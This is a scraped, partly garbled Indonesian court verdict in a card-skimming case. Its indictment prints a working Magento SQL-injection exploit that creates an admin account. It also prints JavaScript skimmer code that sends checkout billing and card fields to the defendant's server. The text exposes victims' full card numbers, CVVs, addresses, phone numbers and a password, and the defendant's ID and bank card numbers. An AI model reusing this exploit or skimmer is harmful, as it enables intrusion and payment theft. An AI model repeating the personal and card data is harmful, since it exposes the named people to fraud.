Putusan 252 Pid - Sus 2020 PN SMN 20210901

am
u b
Direktori Putusan Mahkamah Agung Republik Indonesia
ep
putusan.mahkamahagung.go.id
hk
a
PUTUSAN
R
Nomor 252/Pid.Sus/2020/PN Smn
si
ne
ng
DEMI KEADILAN BERDASARKAN KETUHANAN YANG MAHA ESA
Pengadilan Negeri Sleman yang mengadili perkara pidana dengan acara
pemeriksaan biasa dalam tingkat pertama menjatuhkan putusan sebagai berikut
do
gu dalam perkara Terdakwa :
1. Nama lengkap : ARDIANSYAH
In
A
2. Tempat lahir : Sangatta
3. Umur/Tanggal lahir : 23/25 September 1996
ah
4. Jenis kelamin : Laki-laki
lik
5. Kebangsaan : Indonesia
6. Tempat tinggal : Singosari Ds Jombor Baru No 03 Sinduadi Mlati Sleman
am
ub
Daerah Istimewa Yogyakarta Atau Apartemen Taman
Melati Yogyakarta Sinduadi Jemb Baru UGM Jl Pogung
ep
Kidul Sinduadi Kec Mlati Kab Sleman
k
7. Agama : Islam
ah
8. Pekerjaan : Karyawan Swasta

R
si
Terdakwa Ardiansyah ditahan dalam tahanan rutan oleh:
ne
ng
1. Penyidik sejak tanggal 7 Februari 2020 sampai dengan tanggal 26 Februari 2020;
2. Penyidik Perpanjangan Oleh Penuntut Umum sejak tanggal 27 Februari 2020
do
gu
sampai dengan tanggal 6 April 2020;

3. Penyidik Perpanjangan Pertama Oleh Ketua Pengadilan Negeri sejak tanggal 7
April 2020 sampai dengan tanggal 6 Mei 2020
In
A
4. Penyidik Perpanjangan Kedua Oleh Ketua Pengadilan Negeri sejak tanggal 7 Mei
2020 sampai dengan tanggal 5 Juni 2020
ah
lik
5. Penuntut Umum sejak tanggal 28 Mei 2020 sampai dengan tanggal 16 Juni 2020;
6. Hakim Pengadilan Negeri Sleman sejak tanggal 10 Juni 2020 sampai dengan
m
ub
tanggal 09 Juli 2020;

ka
Terdakwa menghadap sendiri;

ep
ah
Pengadilan Negeri tersebut;

R
Setelah membaca:
es
- Penetapan Ketua Pengadilan Negeri Sleman Nomor 252/Pid.Sus/2020/PN

M
ng
Smn tanggal 10 Juni 2020 tentang penunjukan Majelis Hakim;

on
Halaman 1 dari 47 Putusan Nomor 252/Pid.Sus/2020/PN Smn

gu
d
In
A
Disclaimer
Kepaniteraan Mahkamah Agung Republik Indonesia berusaha untuk selalu mencantumkan informasi paling kini dan akurat sebagai bentuk komitmen Mahkamah Agung untuk pelayanan publik, transparansi dan akuntabilitas
h
pelaksanaan fungsi peradilan. Namun dalam hal-hal tertentu masih dimungkinkan terjadi permasalahan teknis terkait dengan akurasi dan keterkinian informasi yang kami sajikan, hal mana akan terus kami perbaiki dari waktu kewaktu.
ik
Dalam hal Anda menemukan inakurasi informasi yang termuat pada situs ini atau informasi yang seharusnya ada, namun belum tersedia, maka harap segera hubungi Kepaniteraan Mahkamah Agung RI melalui :
Email : kepaniteraan@mahkamahagung.go.id Telp : 021-384 3348 (ext.318) Halaman 1
am
u b
ep
hk
a
- Penetapan Majelis Hakim Nomor 252/Pid.Sus/2020/PN Smn tanggal 10 Juni
R
2020 tentang penetapan hari sidang;
si
- Berkas perkara dan surat-surat lain yang bersangkutan;
ne
ng
Setelah mendengar keterangan Saksi-saksi dan Terdakwa serta
memperhatikan bukti surat dan barang bukti yang diajukan di persidangan;
Setelah mendengar pembacaan tuntutan pidana yang diajukan oleh Penuntut
do
gu Umum yang pada pokoknya sebagai berikut:
1. Menyatakan terdakwa Ardiansyah terbukti secara sah dan menyakinkan bersalah
In
A
melakukan tindak pidana “dengan sengaja dan tanpa hak melakukan intersepsi
atau penyadapan atas informasi elektronik dalam suatu sistem elektronik tertentu
ah
milik orang lain” sebagaimana diatur dan diancam pidana dalam Pasal 31 ayat (1)
lik
jo. Pasal 47 Undang-Undang Nomor 11 Tahun 2008 tentang Informasi dan
Transaksi Elektronik sebagaimana diubah dengan Undang-Undang Nomor 19
am
ub
Tahun 2016 tentang Perubahan Atas Undang-Undang Nomor 11 Tahun 2008
tentang Informasi dan Transaksi Elektronik.
ep
2. Menjatuhkan pidana terhadap terdakwa dengan pidana penjara selama 8 (delapan)
k
bulan dikurangi masa penahanan yang telah dijalani oleh terdakwa dan pidana
ah
denda sebanyak Rp5.000.000,00 (lima juta rupiah) subsider pidana kurungan

R
si
selama 2 (dua) bulan;
3. Menetapkan barang bukti berupa :
ne
ng
 1 (satu) buah KTP atas nama ARDIANSYAH dengan N.I.K.

6408042509960006
do
gu
 1 (satu) buah SIM A atas nama ARDIANSYAH dengan nomor

14489609000016
1 (satu) buah SIM C atas nama ARDIANSYAH dengan nomor
In

A
1723180100025
 1 (satu) buah kartu mahasiswa Universitas AMIKOM Yogyakarta atas
ah
lik
nama ARDIANSYAH dengan nomor 16.01.3800

 1 (satu) buah kartu ATM Bank BNI dengan nomor kartu
m
ub
5371762280132064
 1 (satu) set perhiasan emas yang terdiri dari cincin dan kalung
ka
Dikembalikan kepada Terdakwa.

ep
 1 (satu) unit Modem Wifi indihome internet warna putih

ah
 1 (satu) buah Hardisk dengan kapasitas 6 terra

R
 1 (satu) unit PC computer TUF GAMING VG27AQ

es
Dirampas untuk dimusnahkan;

M
ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
 1 (satu) bundle dokumen data perusahaan E-commers yang telah
R
menjadi korban Mallware website www.rest_api.web.id yang berisi malware JS
si
Sniffer.
ne
ng
 1 (satu) bundle screenshoot situs www.rest_api.web.id
 1 (satu) buah Flasdisk backup isi website www.rest_api.web.id
1 (satu) bundle screenshoot hasil scanning situs
do

gu www.rest_api.web.id yang di blok anti virus karena mengandung Malware JS
Snifer
In
A
 1 (satu) bundle skrip yang di tambahkan oleh tersangka didalam
website http://www.fullthrottlespeed.com.
ah
Dilampirkan dalam berkas perkara.
lik
4. Menetapkan agar terdakwa dibebani membayar biaya perkara sebesar Rp. 2.000,-
(dua ribu rupiah).
am
ub
Setelah mendengar permohonan Terdakwa yang pada pokoknya
menyatakan mohon keringanan hukuman;
ep
Menimbang, bahwa Terdakwa diajukan ke persidangan oleh Penuntut Umum
k
didakwa berdasarkan surat dakwaan sebagai berikut:

ah
Primair:
R
si
Bahwa terdakwa ARDIANSYAH pada hari dan tanggal yang tidak dapat
diingat lagi, pada akhir tahun 2017 sampai dengan awal tahun 2020 atau setidak-
ne
ng
tidaknya pada waktu dalam tahun 2017 sampai dengan 2020, bertempat di Singosari
Ds. Jombor Baru No.3 Sinduadi Mlati Kab. Sleman, provinsi Daerah Istimewa
do
gu
Yogyakarta atau setidak-tidaknya atau setidak-tidaknya pada suatu tempat lain dalam
daerah hukum Pengadilan Negeri Sleman yang berwenang memeriksa dan mengadili
perkara terdakwa, dengan sengaja dan tanpa hak atau melawan hukum melakukan
In
A
intersepsi atau penyadapan atas informasi elektronik dan/atau dokumen elektronik

dalam suatu komputer dan/atau sistem elektronik tertentu milik orang lain, yang
ah
lik
dilakukan dengan cara sebagai berikut:

- Bahwa terdakwa ARDIANSYAH membuat dan mengelola website www.rest-
m
ub
api.web.id pada penyedia jasa hosting, IDwebhost, dimana terdakwa membeli

paket domain dan hosting secara daring (online) melalui alamat website jasa
ka
hosting tersebut yaitu http://www.idwehost.com.

ep
- Terdakwa kemudian mempelajari dan mendapatkan kode berbahaya yang dikenal

ah
sebagai JavaScript-Sniffer (JS Sniffer) sejenis malware yang dirancang untuk

R
mencuri data pembayaran pelanggan dari toko online dari artikel-artikel yang ada di
es
google, yang lalu terdakwa memodifikasi script (bahasa pemrograman) tersebut

M
ng
sesuai kebutuhan yang diinginkan yaitu data kartu kredit seperti nomor kartu kredit,
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
nama, email, alamat, username, password dengan cara menambahkan
R
script get billing atau get payment. Setelah script dimodifikasi, terdakwa simpan
si
dalam file manager cPanel website www.rest-api.web.id untuk memudahkan
ne
ng
terdakwa menggunakan script tersebut. Fungsi script JS Sniffer yang disimpan di
file manager cPanel website www.rest-api.web.id adalah bentuk perintah dalam
bahasa pemrograman agar malware masuk ke dalam website “target”, lalu
do
gu malware akan mengkloning data pembeli website toko melalui media daring (e-
commerce) yang menjadi target, kemudian dikirimkan ke website www.rest-
In
A
api.web.id, sehingga pada saat bersamaan data pembeli yang masuk ke website e-
commerce target juga terkirim ke website www.rest-api.web.id.
ah
- Bahwa cara terdakwa mendapatkan data-data billing (pembelian) berupa data kartu
lik
kredit dan passwordnya dari website e-commerce adalah diawali terdakwa
melakukan scanning website e-commerce yang memiliki kerentanan keamanan
am
ub
(vulnerabilitas) siber menggunakan script pyton melalui Peladen Pribadi Virtual
(Virtual Private Server atau disingkat VPS) sehingga terdakwa akan mendapatkan
ep
username dan password untuk login (mengakses) ke website e-commerce yang
k
memiliki kelemahan tersebut sebagai target. Penggunaan script pyton oleh

ah
terdakwa merupakan bentuk perintah untuk mencari akses admin dari website
R
si
target yang akan digunakan terdakwa untuk memasukkan malware:
import requests
ne
ng
import base64
import sys
target = "http://target.com/"
do
gu
if not target. startswith("http"):

target = "http://" + target
if target. Endswith ("/"):

target = target [: -1]
In
A
target_url = target + "/admin/Cms_Wysiwyg/directive/index/"
q="""
ah
lik
SET @SALT = 'rp';

SET @PASS = CONCAT (MD5(CONCAT (@SALT, '{password}')), CONCAT (':', @SALT));
SELECT @EXTRA: = MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO àdmin_user` (`firstname`, `lastname, èmail, ùsername, `password, `created, `lognum,
`reload_acl_flag`,ìs_active`,èxtra`,`rp_token`,`rp_token_created_at`) VALUES
m
ub
('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO àdmin_role` (parent_id, tree_level, sort_order, role_type, user_id, role_name) VALUES
(1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""
ka
ep
query = q. replaces ("\n", ""). Format (username="forme", password="forme")

pfilter = "popularity[from]=0&popularity[to]=3& popularity [field_ expr] =0); {0}". Format(query)
ah
#
e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9f
R
Q decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}

es
r = requests. Post (target_url,

data = {"___directive":
M
"e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9f
ng
Q",
"filter": base64.b64encode(pfilter),
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
"forwarded": 1})
R
if r. ok:
si
print "WORKED"
print "Check {0}/admin with creds forme: forme". Format (target)
else:
ne
ng
print "DID NOT WORK"
Saat terdakwa login sebagai admin website e-commerce yang menjadi target dengan
do
gu menggunakan username dan password hasil scanning, terdakwa menginjeksi atau
menyusupkan script JS Sniffer yang tersimpan di website www.rest-api.web.id dan
sudah terdakwa modifikasi tersebut:
In
A
function b64EncodeUnicode(e){return btoa(encodeURIComponent(e).replace(/%([0-9A-F]
{2})/g,function(e,n){return String.fromCharCode("0x"+n)}))}function sendPost(e,n){var t=new
XMLHttpRequest;t.onreadystatechange=function()
ah
lik
{4==this.readyState&&200==this.status&&console.log("Success gan !")},t.open("POST",e,!
0),t.setRequestHeader("Content-type","application/x-www-
formurlencoded"),t.send("log="+n)}function getBilling(){var e=[],n=document.getElementById("co-
billingform");for(i=0;i<n.elements.length;i++)(n.elements[i].name||
am
ub
n.elements[i].value)&&e.push(n.elements[i].name+" : "+n.elements[i].value);return e}function
getPayment(){var e=[],n=document.getElementById("co-
paymentform");for(i=0;i<n.elements.length;i++)(n.elements[i].name||
buildData(){return b64EncodeUnicode(getBilling().join("\n")
ep
+getPayment().join("\n"))}document.onclick=function(e){void 0===e&&(e=window.event);var
k
n="target"in e?e.target:e.srcElement;if("button
btncheckout"==n.className||"SPAN"==n.tagName){var
ah
t=document.getElementsByName("payment[cc_number]");t&&""!
R
==t.value&&sendPost("https://rest-api.web.id/y.php",buildDa ta())}else
si
console.log(n.className+" = "+n.tagName)};
<script src='https://rest-api.web.id/evil.js'></script>
ne
ng
Kemudian perintah login dan sisipan script JS Sniffer akan melakukan scanning
do
terhadap website e-commerce target, maka secara otomatis data-data billing website
gu
e-commerce target akan masuk/dikirimkan ke website www.rest-api.web.id dalam

bentuk txt berisi data kartu kredit pembeli dari website e-commerce target seperti
In
A
nomor kartu kredit, nama, alamat dan kata sandi.

- Bahwa sejak akhir tahun 2017 sampai dengan awal tahun 2019, 2020 terdakwa
ah
lik
melakukan kegiatan perekaman atas informasi elektronik milik pelanggan toko

online berupa data kartu kredit tanpa diketahui dan tanpa diijinkan oleh pelanggan
toko online selaku pemilik kartu kredit termasuk tanpa diijinkan oleh pengelola
m
ub
website toko online (e-commerce) tersebut kemudian terdakwa yang di kirimkan ke

ka
alamat website www.rest-api.web.id yang merupakan milik dan dikelola oleh

ep
terdakwa di kontrakan terdakwa Singosari Ds. Jombor Baru No.3 Sinduadi Mlati
Kab. Sleman Daerah Istimewa Yogyakarta. Berikut salah satu contoh data kartu
ah
kredit milik orang lain yang direkam dan dikirimkan oleh terdakwa ke data base
R
es
website www.rest-api.web.id:
M
ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
a. Data kartu kredit American Express milik saksi Edward Kang sebagai pelanggan
R
website http://www.fullthrottlespeed.com yang oleh terdakwa direkam dan
si
dikirimkan tanpa diketahui dan tanpa ijin baik dari saksi Edward Kang maupun saksi
ne
ng
Caroline Ann Ford selaku admin website http://www.fullthrottlespeed.com ke
website www.rest-api.web.id :
billing_address_ id:
do
gu billing[address_id]: 127203
billing[firstname]: Edward
billing[lastname]: Kang
billing[company]:
billing[country_id]: US
billing[street] []: 312 W 101st St
In
A
billing[street] []: Apt 5
billing[city]: New York
billing[region_id]: 43
billing[region]:
billing[postcode]: 10025
ah
lik
billing[telephone]: 9176134278
billing[fax]:
billing [save_in_address_book: 1
billing[use_for_shipping]: 1
am
ub
=================================================
billing_address_id:
billing[address_id]: 127203
billing[company]:
ep
k

ah

R
billing[region]:
si
billing[fax]:
ne
billing[save_in_address_book]: 1
ng
billing[use_for_shipping]: 0 payment [method: authnetcim
payment[cc_type]: AE
payment[cc_number]: 379251671631002
payment[cc_exp_month]: 10
do
gu
payment[cc_exp_year]: 2023
payment[cc_cid]: 9016
payment[save]: 0
payment[save]: 1
payment[method]: paypal_express_bml
In
payment[method]: paypal_express
A
=================================================
b. Data kartu kredit milik saksi Ida Bagus Surya Manuaba

From: Ida bagus surya Manuaba <mcqueen@gagasaousd.com>
ah
lik
Sent: 28/1/2020 1:54:14 pm +0700

To: sosnovka.military2662@gmail.com
Subject 522846 - MASTERCARD CREDIT WORLD PT. ANZ PANIN BANK
: [ Indonesia - Android - 36.85.246.149 ]
m
#--------------------------------[ 1 6 S H O P] -----------------------------#
ub
#--------------------------------[ LOGIN DETAILS] -------------------------------#

Apple ID : ciwabudha@gmail.com
Password : Pemuda226
#--------------------------------[ CARD DETAILS] -------------------------------#
ka
Bank : PT. ANZ PANIN BANK

ep
Type : MASTERCARD - CREDIT

Level : WORLD
Cardholders : Ida bagus surya putra manuaba
CC Number : 5228460001070490
ah
Expired : 02/2022
CVV : 142
R
AMEX CID :
es
Sort Code :
Credit Limit :
M
Copy : 5228460001070490|02|22|142
ng
#--------------------------[ JAPAN INFO] -----------------------------#

WEB ID :
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
Card Password :
#-------------------------[ PERSONAL INFORMATION] --------------------------------#
R
First Name : Ida bagus surya
si
Last Name : Manuaba
Address : Jalan pemuda 2 no.26
City : Denpasar
State : Bali
ne
ng
Country : Indonesia
Zip : 80235
BirthDay : 28/07/1973
Phone : 081236083110
#------------------------[ SOCIAL INFORMATION] ------------------------------#
do
ID Number :
gu Civil ID
Qatar ID
National ID
Citizen ID
:
:
:
:
Passport Number :
In
A
Bank Access Number :
Social Insurance Number :
Social Security Number :
Account Number :
OSID Number :
ah
lik
#--------------------------[ PC INFORMATION] --------------------------------#
IP Address : 36.85.246.149
Region : Bali
City : Denpasar
Continent : Asia
am
ub
Timezone : Asia/Makassar
OS/Browser : Android / Handheld Browser
Date : 28 Jan, 2020, Time: 1:54 pm
User Agent : Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N950F Build/NMF26F)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
AlohaBrowser/2.11.0.1
ep
#--------------------------[ NEVER DIE ]-----------------------------#
k
ah
Perbuatan terdakwa diatur dan diancam pidana dalam pasal 31 ayat (1) jo.
R
si
pasal 47 Undang-Undang Nomor 11 Tahun 2008 tentang Informasi dan Transaksi
Elektronik sebagaimana diubah dengan Undang-Undang Nomor 19 Tahun 2016
ne
ng
tentang Perubahan Atas Undang-Undang Nomor 11 Tahun 2008 tentang Informasi

dan Transaksi Elektronik.
do
gu
Subsidiair:
In
A
tidaknya pada waktu dalam tahun 2017 sampai dengan 2020, atau setidak-tidaknya
pada waktu lain dalam tahun 2017 sampai dengan tahun 2020, bertempat di Singosari
ah
lik
m
ub
perkara terdakwa, dengan sengaja dan tanpa hak atau melawan hukum dengan cara
ka
apapun memindahkan atau mentransfer informasi elektronik dan/atau dokumen

ep
elektronik kepada sistem elektronik orang lain yang tidak berhak, yang dilakukan
ah
dengan cara sebagai berikut:

R
------------------------------------------------------------------------------
es

M
ng

on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
paket domain dan hosting secara daring (online) melalui alamat website jasa
R
si
ne
ng
do
gu sesuai kebutuhan yang diinginkan yaitu data kartu kredit seperti nomor kartu kredit,
In
A
ah
lik
am
ub
malware akan mengkloning data pembeli website toko melalui media daring (e-
ep
k

ah
R
si
ne
ng

do
gu

In
A

import requests
ah
lik
import base64
import sys
m
ub


ka

ep

ah
q="""
SET @SALT = 'rp';
R

es

M
ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
R
"""
si
ne
ng
#
do
gu Q",
In
A
"forwarded": 1})
if r. ok:
print "WORKED"
ah
else:
lik
am
ub
menggunakan username dan password hasil scanning, terdakwa menginjeksi atau
menyusupkan script JS Sniffer yang tersimpan di website www.rest-api.web.id dan
ep
sudah terdakwa modifikasi tersebut:
k

ah

R
si
ne
ng
do
gu
In
A
ah
lik
m
ub
ka
ep

ah
- Bahwa sejak akhir tahun 2017 sampai dengan awal tahun 2019, terdakwa
R

es
M
ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
website toko online (e-commerce) tersebut kemudian terdakwa kirimkan ke alamat
R
website www.rest-api.web.id yang merupakan milik dan dikelola oleh terdakwa di
si
kontrakan terdakwa Singosari Ds. Jombor Baru No.3 Sinduadi Mlati Kab. Sleman
ne
ng
Daerah Istimewa Yogyakarta. Berikut salah satu contoh data kartu kredit milik orang
lain yang direkam dan dikirimkan oleh terdakwa ke data base website www.rest-
api.web.id:
do
gu b. Data kartu kredit American Express milik saksi Edward Kang sebagai pelanggan
In
A
ah
lik
am
ub
billing[company]:
ep
k
billing[region]:
ah
billing[fax]:
R
si
=================================================
billing_address_id:
ne
ng
billing[company]:
do
gu

billing[region]:
In
A
billing[fax]:
ah
lik
m
payment[save]: 0
ub
payment[save]: 1
=================================================
ka
ep

Sent: 28/1/2020 1:54:14 pm +0700
ah
R

es
#--------------------------------[ 1 6 S H O P] -----------------------------#
M
#--------------------------------[ LOGIN DETAILS] -------------------------------#

ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
#--------------------------------[ CARD DETAILS] -------------------------------#
R
si
Level : WORLD
CC Number : 5228460001070490
Expired : 02/2022
ne
ng
CVV : 142
AMEX CID :
Sort Code :
Credit Limit :
Copy : 5228460001070490|02|22|142
do
#--------------------------[ JAPAN INFO] -----------------------------#
gu WEB ID
Card Password

:
:
Last Name : Manuaba
In
A
City : Denpasar
State : Bali
Country : Indonesia
Zip : 80235
ah
lik
BirthDay : 28/07/1973
Phone : 081236083110
ID Number :
Civil ID :
am
ub
Qatar ID :
National ID :
Citizen ID :
Passport Number :
ep
k
Account Number :
OSID Number :
ah
#--------------------------[ PC INFORMATION] --------------------------------#

IP Address : 36.85.246.149
R
Region : Bali
si
City : Denpasar
Continent : Asia
ne
ng
Date : 28 Jan, 2020, Time: 1:54 pm

#--------------------------[ NEVER DIE ]-----------------------------#
do
gu
Perbuatan terdakwa diatur dan diancam pidana dalam pasal 32 ayat (2) jo
In
A
pasal 48 ayat (2) Undang-Undang Nomor 11 Tahun 2008 tentang Informasi dan
Transaksi Elektronik sebagaimana diubah dengan Undang-Undang Nomor 19 Tahun
ah
2016 tentang Perubahan Atas Undang-Undang Nomor 11 Tahun 2008 tentang

lik
Informasi dan Transaksi Elektronik.

Lebih Subsidiair:
m
ub
ka
ep
tidaknya pada waktu dalam tahun 2017 sampai dengan 2020,0 atau setidak-tidaknya
pada waktu lain dalam tahun 2017 sampai dengan tahun 2020 bertempat di Singosari
ah
R
es
M
ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
perkara terdakwa, dengan sengaja dan tanpa hak atau melawan hukum mengakses
R
komputer dan/atau sistem elektronik dengan cara apapun dengan tujuan untuk
si
memperoleh informasi elektronik dan/atau dokumen elektronik, yang dilakukan
ne
ng
dengan cara sebagai berikut:
do
gu paket domain dan hosting secara daring (online) melalui alamat website jasa
In
A
ah
lik
sesuai kebutuhan yang diinginkan yaitu data kartu kredit seperti nomor kartu kredit,
am
ub
ep
k

ah

R
si
ne
ng

do
gu

In
A

ah
lik
m
ub

ka

ep
import requests
import base64
ah
import sys
R
es

M

ng

on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
R
si
q="""
SET @SALT = 'rp';
ne
ng
do
gu INSERT INTO àdmin_role` (parent_id, tree_level, sort_order, role_type, user_id, role_name) VALUES
"""
In
A
#
ah
lik
Q",
am
ub
"forwarded": 1})
if r. ok:
print "WORKED"
ep
k
else:
ah
R
si
menggunakan username dan password hasil scanning, terdakwa menyisipkan
ne
ng
menginjeksi atau menyusupkan script JS Sniffer yang tersimpan di website www.rest-

api.web.id dan sudah terdakwa modifikasi tersebut:
do
gu

In
A
ah
lik
m
ub
ka
ep
ah
R
es
M

ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
R
si
- Bahwa sejak akhir tahun 2017 sampai dengan awal tahun 2019, terdakwa
ne
ng
do
gu website toko online (e-commerce) tersebut kemudian terdakwa kirimkan ke alamat
In
A
Daerah Istimewa Yogyakarta. Berikut salah satu contoh data kartu kredit milik orang
ah
lain yang direkam dan dikirimkan oleh terdakwa ke data base website www.rest-
lik
api.web.id:
c. Data kartu kredit American Express milik saksi Edward Kang sebagai pelanggan
am
ub
ep
k
ah
R
si
billing[company]:
ne
ng

billing[region]:
do
gu
billing[fax]:
In
A
=================================================
billing_address_id:
ah
lik
billing[company]:
m
ub
billing[region]:
ka
billing[fax]:
ep
ah
R
es
payment[save]: 0
payment[save]: 1
M
ng
=================================================
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
si
Sent: 28/1/2020 1:54:14 pm +0700
ne
ng
#--------------------------------[ 1 6 S H O P] -----------------------------#
#--------------------------------[ LOGIN DETAILS] -------------------------------#
do
gu #--------------------------------[ CARD DETAILS] -------------------------------#
Bank
Type
Level
: PT. ANZ PANIN BANK
: MASTERCARD - CREDIT
: WORLD
In
CC Number : 5228460001070490
A
Expired : 02/2022
CVV : 142
AMEX CID :
Sort Code :
ah
lik
Credit Limit :
Copy : 5228460001070490|02|22|142
#--------------------------[ JAPAN INFO] -----------------------------#
WEB ID :
Card Password :
am
ub
Last Name : Manuaba
City : Denpasar
State : Bali
Country
ep : Indonesia
k
Zip : 80235
BirthDay : 28/07/1973
Phone : 081236083110
ah

ID Number :
R
si
Civil ID :
Qatar ID :
National ID :
Citizen ID :
ne
ng
Passport Number :
Account Number :
do
OSID Number :
gu
#--------------------------[ PC INFORMATION] --------------------------------#

IP Address : 36.85.246.149
Region : Bali
City : Denpasar
Continent : Asia
In
A
Date : 28 Jan, 2020, Time: 1:54 pm
ah
lik
#--------------------------[ NEVER DIE ]-----------------------------#
m
ub
Perbuatan terdakwa diatur dan diancam pidana dalam pasal 30 ayat (2) jo.
pasal 46 ayat (2) jo Undang-Undang Nomor 11 Tahun 2008 tentang Informasi dan
ka
Transaksi Elektronik sebagaimana diubah dengan Undang-Undang Nomor 19 Tahun

ep
2016 tentang Perubahan Atas Undang-Undang Nomor 11 Tahun 2008 tentang

ah
Informasi dan Transaksi Elektronik.

R
Menimbang, bahwa terhadap dakwaan Penuntut Umum, Terdakwa tidak

es
mengajukan keberatan;
M
ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
Menimbang, bahwa untuk membuktikan dakwaannya Penuntut Umum telah
R
mengajukan Saksi-saksi pada pokoknya menerangkan sebagai berikut:
si
Saksi 1. Hari Wibowo S.Kom, dibawah sumpah / janji* pada pokoknya menerangkan
ne
ng
sebagai berikut:
- Bahwa saksi bertugas di Direktorat Tindak Pidana Siber Bareskrim Polri.
- Bahwa Direktorat Tindak Pidana Siber Bareskrim Polri mendapat laporan dari
do
gu INTERPOL Inggris bahwa telah ada tindak pidana yang berkaitan dengan ITE yang
berasal dari Indonesia. Kemudian berdasarkan laporan tersebut, saksi beserta tim
In
A
melakukan penyelidikan sehingga ditemukan hasil ada beberapa pelaku di
Indonesia yang melakukan intersepsi atau penyadapan dan pencurian data kartu
ah
kredit, yang salah satu pelaku tersebut adalah Terdakwa Ardiansyah.
lik
- Bahwa antara terdakwa Ardiansyah dan pelaku lainnya saling kenal namun
perbuatan terdakwa Ardiansyah tidak ada hubungannya dengan perbuatan pelaku
am
ub
lainnya.
- Bahwa pada tahun 2017 s/d awal 2020 bertempat di tempat terdakwa di Singosari
ep
Ds. Jombor Baru No.03 Sinduadi Mlati Kab. Sleman DIY, pemilik domain website
k
www.rest-api.web.id telah melakukan akses ilegal terhadap website e-commerce

ah
yang ada di berbagai negara dengan menggunakan malware (virus) sehingga data
R
si
pribadi kartu kredit pembeli yang telah mengakses website e-commerce tersebut
juga didapat oleh pemilik domain website www.rest-api.web.id.
ne
ng
- Bahwa Interpol telah melakukan identifikasi dan pengambilan sampel dari berbagai
sumber yang terkait dengan situs web e-commerce yang berpotensi terinfeksi dan
do
gu
secara infrastruktur milik penjahat/hacker sebagai CnC (Command and Center)

Mallware JS-SNIFFER.
- Bahwa beberapa website yang berfungsi sebagai CnC ada di Indonesia dan
In
A
beberapa website e-commerce sebagai korban ada di USA, Hongkong.

- Bahwa penyelidikan yang dilakukan tim Penyidik adalah dengan membuka log file
ah
lik
beberapa website e-commerce yang telah diakses illegal, sampai menemukan

alamat website www.rest-api.web.id
m
ub
- Bahwa kemudian tim juga mencoba mengidentifikasi domain dari alamat website
www.rest-api.web.id, sampai menemukan informasi terdakwa Ardiansyah dengan
ka
alamat email pakhaxor09999@gmail.com, tempat tinggal Jalan Hos Cokroaminoto

ep
Nomor 34 Yogyakarta, Indonesia dan nomor telepon seluler 082136515813.

ah
- Bahwa alamat website www.rest-api.web.id didaftarkan pada jasa layanan internet

R
(layanan hos web) Jogja Camp dengan identitas pendaftar Ardiansyah sebagai
es
pemilik domain.
M
ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
- Bahwa untuk mengetahui apakah alamat website dimaksud telah mengirimkan
R
malware (virus) kepada beberapa e-commerce, tim mencoba mengakses website
si
dimaksud dengan menggunakan PC yang dilengkapi program antivirus Kaspersky
ne
ng
yang dirancang untuk melindungi pengguna dari malware (virus) dan ternyata
benar program tersebut mendeteksi adanya malware pada alamat website
dimaksud dan ketika diakses menggunakan komputer lain, website tersebut sudah
do
gu tidak dapat diakses.
- Bahwa berdasarkan logfile diketahui juga ketika pemilik domain website www.rest-
In
A
api.web.id mengakses beberapa e-commerce, ada data yang masuk kembali
kepada alamat website www.rest-api.web.id.
ah
- Bahwa atas untuk kode program, malware yang digunakan pelaku kepada
lik
beberapa website e-commerce, menyebabkan terjadi pencurian data / informasi
elektronik terbukti dengan data yang terkirim ke website pelaku dan hal itu
am
ub
merupakan hal yang illegal.
- Bahwa cara terdakwa melakukan tindak pidana tersebut adalah dengan mengelola
ep
website www.rest-api.web.id yang mengirimkan malware dengan script tertentu ke
k
beberapa website e-commerde di berbagai Negara sehingga website e-commerce

ah
yang menjadi korban tersebut akan terinfeksi malware yang dikirim oleh terdakwa
R
si
dan beberapa data dari website e-commerce tersebut terkirim ke website www.rest-
api.web.id.
ne
ng
- Bahwa data yang diambil atau dipindahkan oleh terdakwa dengan cara tersebut ke
website milik terdakwa adalah data pemilik kartu kredit berupa nama pemilik kartu
do
gu
kredit, nomor kartu kredit, alamat, jenis kartu kredit, alamat email dan data-data
lainnya.
- Bahwa data-data yang diambil oleh terdakwa tersebut antara lain data milik Edward
In
A
Kang yang terdakwa peroleh dari website e-commerce

http://www.fullthrottlespeed.com dan data milik Ida Bagus Surya Manuaba.
ah
lik
- Bahwa selain mengambil atau memindahkan data kartu kredit milik Edward Kang
dan Ida Bagus Surya Manuaba, terdakwa juga melakukan pembelian online
m
ub
menggunakan data kartu kredit milik Edward Kang untuk membeli 1 buah laptop
alienware seharga Rp. 19.600.000,-.
ka
- Bahwa ada sekitar ratusan data kartu kredit yang telah diambil oleh terdakwa yang
ep
masuk ke dalam website www.rest-api.web.id.

ah
- Bahwa data-data kartu kredit tersebut ada yang terdakwa jual dan ada yang
R
terdakwa gunakan untuk pembelian online.

es
